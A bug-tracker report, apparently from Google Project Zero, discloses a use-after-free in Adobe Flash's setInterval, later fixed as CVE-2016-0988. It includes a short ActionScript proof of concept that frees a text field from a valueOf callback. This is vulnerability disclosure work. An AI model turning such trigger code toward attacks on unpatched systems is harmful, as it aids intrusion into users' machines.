New issue
Advanced search Search tips
Starred by 1 user
Status: Fixed
Owner:
Closed: Mar 2016
Cc:



Sign in to add a comment
Adobe Flash: Use-after-free in setInterval
Project Member Reported by natashenka@google.com, Dec 18 2015 Back to list
There is a use-after-free in setInterval. If the interval length is an object with valueOf defined, this method gets executed, and can delete the object the interval is being set on. A minimal PoC is as follows:

_global.thiz = this;
var t = _global.thiz;
var tf = t.createTextField("tf", 1, 1, 2, 3, 4);
tf.natalie = intfunc;
setInterval(tf, "natalie", {valueOf: func});


function intfunc(){
	
	trace("tick");
	trace(this);
	this.text = this;
	}
	
	
function func(){
	
	tf.removeTextField();
	trace("after free");
	var tf2 = _global.thiz.createTextField("tf2", 5, 1, 2, 300, 400);
	tf2.natalie = intfunc;
	return 100;
	
	}

This PoC demonstrates the use-after-free because the interval is set on the newly allocated object, even though it was called on the object that was freed. The test fails (demonstrates the vulnerability) if the text "_level0.tf2" appears on the screen. It passes otherwise. I have not been able to make this issue cause a crash, as there does not appear to be anything interesting ever allocated in the same heap slot as the freed object, so I think this issue is probably not exploitable. Reporting it because I am not confident of this, especially on 32-bit platforms.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 
interval.fla
4.9 KB Download
interval.swf
843 bytes Download
Project Member Comment 1 by natashenka@google.com, Mar 22 2016
Labels: -Restrict-View-Commit CVE-2016-0988
Status: Fixed
Fixed in March update
Sign in to add a comment